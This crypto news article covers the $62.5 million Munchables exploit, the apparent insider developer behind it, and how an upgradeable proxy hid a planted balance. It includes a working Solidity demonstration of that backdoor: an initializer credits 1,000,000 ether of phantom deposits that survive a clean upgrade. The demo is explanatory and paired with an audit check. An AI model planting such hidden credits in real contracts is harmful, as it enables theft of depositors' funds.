Web3 Game Munchables Loses $62.5 Million to Exploit: ZachXBT

Hongji Feng

The web3 gaming platform Munchables suffered a major security breach, losing roughly $62.5 million worth of ETH through an exploit of its contracts on the Blast network.

Munchables confirmed the exploit in a social media post, stating that the loss occurred on March 26. “Munchables has been compromised,” said Munchables. “We are tracking movements and attempting to stop the transactions. We will update as soon as we know more.”

Investigation Suggests Potential Link to Munchables Insider

According to the on-chain investigator ZachXBT, the exploiter extracted about 17,414 ETH, worth $62.5 million at the time, as shown by transaction data on Blastscan.

ZachXBT dug further and found evidence that the exploit may have been carried out by one of Munchables' own developers, who appears to have been hired by the team under four separate identities.

“Four different devs hired by the Munchables team and linked to the exploiter are likely all the same person as they recommended each other for the job,” said ZachXBT.

The suspect also “regularly transferred payments to the same two exchange deposit addresses” and “funded each other's wallets.” ZachXBT included the alleged exploiter's GitHub usernames in the post to alert the community.

Exploit Rooted in Upgrade Manipulation

Solidity developer 0xQuit said in a post that the exploit was premeditated, pointing out that a developer had upgraded the Lock contract to a new implementation shortly before the game's release. The Lock contract is the one that holds users' tokens for a set period.

“The Munchables exploit has been planned since deploy,” said 0xQuit, describing the platform as a “dangerously upgradeable proxy.” Because the contract's storage lives in the proxy rather than in any single implementation, the exploiter was able to use the earlier implementation to credit their own address with a 1 million ETH deposit balance that survived the upgrade, and then withdraw real deposits against it.

“If you never knew about the original implementation, the contract would look just fine,” explained 0xQuit. “Even if the dev had transferred ownership back to the team, the damage was done,” the author added, discouraging upgradeability.
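The mechanism 0xQuit describes, as an added illustration that is not Munchables' actual code and not taken from 0xQuit's post: a minimal delegatecall proxy, a first implementation with a planted initializer that credits the caller with 1,000,000 ether of phantom deposits, and a clean second implementation with the same storage layout. The contract names, the `totalDeposited` counter and the `solvent()` invariant check are assumptions made for this example; the real Munchables layout is not published on this page. Deploy `Demo` and call `run()` with a small amount of ether in Remix or a Foundry script to replay the sequence.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Every storage slot belongs to the proxy. Implementations supply code only,
// so swapping the implementation never resets values an earlier one wrote.
contract Proxy {
    address public implementation; // slot 0
    address public owner;          // slot 1

    constructor(address impl) {
        implementation = impl;
        owner = msg.sender;
    }

    function upgradeTo(address impl) external {
        require(msg.sender == owner, "not owner");
        implementation = impl;
    }

    receive() external payable {}

    fallback() external payable {
        address impl = implementation;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Shared layout (assumed for this example). The first two slots mirror the
// proxy so delegatecall'd code does not clobber implementation/owner.
abstract contract LockStorage {
    address internal _implementation;           // slot 0, mirrors Proxy
    address internal _owner;                    // slot 1, mirrors Proxy
    mapping(address => uint256) public deposits; // slot 2
    uint256 public totalDeposited;              // slot 3: sum of all deposits[]
}

// Honest behaviour shared by both versions.
abstract contract LockBase is LockStorage {
    function lock() external payable {
        deposits[msg.sender] += msg.value;
        totalDeposited += msg.value;
    }

    function unlock(uint256 amount) external {
        require(deposits[msg.sender] >= amount, "insufficient");
        deposits[msg.sender] -= amount;
        totalDeposited -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // Invariant a reviewer can query on the live proxy: recorded liabilities
    // must be backed by ether the proxy actually holds.
    function solvent() external view returns (bool) {
        return totalDeposited <= address(this).balance;
    }
}

// The implementation deployed first. Its initializer credits the caller with
// 1,000,000 ether that was never deposited; the credit is written to proxy storage.
contract LockV1 is LockBase {
    bool private _initialized; // slot 4, unused by V2

    function initialize() external {
        require(!_initialized, "already initialized");
        _initialized = true;
        deposits[msg.sender] = 1_000_000 ether;
        totalDeposited += 1_000_000 ether;
    }
}

// The implementation live at launch: same layout, no initializer. Reading only
// this source shows nothing wrong, yet the V1 credit is still in storage.
contract LockV2 is LockBase {}

// Replays the sequence and returns what a post-upgrade reviewer sees.
contract Demo {
    function run() external payable returns (uint256 phantomCredit, bool solventAfterUpgrade) {
        Proxy proxy = new Proxy(address(new LockV1()));
        LockV1 lock = LockV1(address(proxy));      // calls route through the proxy fallback
        lock.initialize();                         // planted credit for Demo's address
        proxy.upgradeTo(address(new LockV2()));    // "clean" code, same storage
        lock.lock{value: msg.value}();             // a genuine deposit, later withdrawable by Demo
        phantomCredit = lock.deposits(address(this)); // still 1,000,000 ether after the upgrade
        solventAfterUpgrade = lock.solvent();      // false: owed far more than held
    }
}
```

The practical check this suggests for any upgradeable proxy is to audit the proxy's storage and the full implementation history on the block explorer, not just the implementation currently live: an invariant such as `totalDeposited <= address(this).balance` fails here the moment the planted credit is written, regardless of which implementation is active or who owns the proxy afterwards.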

In response to the incident, the team announced that all relevant private keys would be handed over to aid the recovery of user funds: the key holding $62,535,441.24 worth of ETH, another holding 73 WETH, and the owner key that secures the remaining funds.